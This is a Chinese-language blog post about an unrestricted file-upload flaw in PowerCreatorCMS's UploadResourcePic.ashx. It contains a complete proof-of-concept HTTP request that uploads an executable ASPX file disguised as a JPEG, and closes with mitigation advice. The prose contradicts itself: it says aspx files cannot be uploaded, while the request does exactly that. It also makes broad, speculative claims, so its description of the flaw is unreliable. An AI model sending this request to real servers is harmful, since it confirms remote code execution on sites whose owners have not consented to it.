PowerCreatorCMS是一个存在多个漏洞的网站构建框架,其中包括了UploadResourcePic.ashx 文件上传漏洞。这个漏洞源于CMS编辑器未对文件上传做任何校验,允许攻击者利用漏洞上传任意格式文件,从而获得服务器控制权1。
攻击者可以通过构造恶意请求,上传包含恶意代码的文件,从而执行任意代码。在UploadResourcePic.ashx 文件中,攻击者可以利用编辑器上传txt和html文件,但不能上传aspx文件,这使得攻击者难以直接获取shell。然而,通过对文件名的分析,可以发现攻击者可能通过其他方法上传了webshell1。
研究人员已经对UploadResourcePic.ashx 漏洞进行了复现,并发现可以通过编辑器上传文件,但只能上传txt和html格式的文件,无法上传aspx文件。此外,他们还发现了一个可能的上传点,即upload目录下的UploadResourcePic.ashx 文件1。
POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136
Accept-Encoding: gzip, deflate
Connection: close
-----------------------------20873900192357278038549710136
Content-Disposition: form-data; name="file1"; filename="qaz.aspx"
Content-Type: image/jpeg
<%@Page Language="C#"%><%Response.Write("hello");System.IO.File.Delete(Request.PhysicalPath);%>
-----------------------------20873900192357278038549710136--
由于PowerCreatorCMS的漏洞描述中提到,厂商均未提供修复方案,这表明所有使用该CMS系统的网站都可能受到此漏洞的影响。攻击者可以利用这些漏洞上传恶意文件,进而控制整个网站服务器1。
综上所述,PowerCreatorCMS的UploadResourcePic.ashx 文件上传漏洞是由于编辑器未对上传文件进行有效校验导致的。攻击者可以利用这个漏洞上传任意格式的文件,从而获得服务器控制权。由于厂商没有提供修复方案,所有使用该CMS的网站都可能存在风险。建议用户尽快采取措施,如设置上传白名单、禁止脚本文件执行、限制文件上传类型等,以防止此类漏洞的利用。同时,也应该关注厂商是否发布了新的补丁或修复程序,及时更新系统以保障网站安全。
本文由作者笔名:来护儿 于 2024-08-04 00:57:38发表在本站,原创文章,禁止转载,文章内容仅供娱乐参考,不能盲信。
本文链接: https://www.xn--ubt767m.wang/wen/5953.html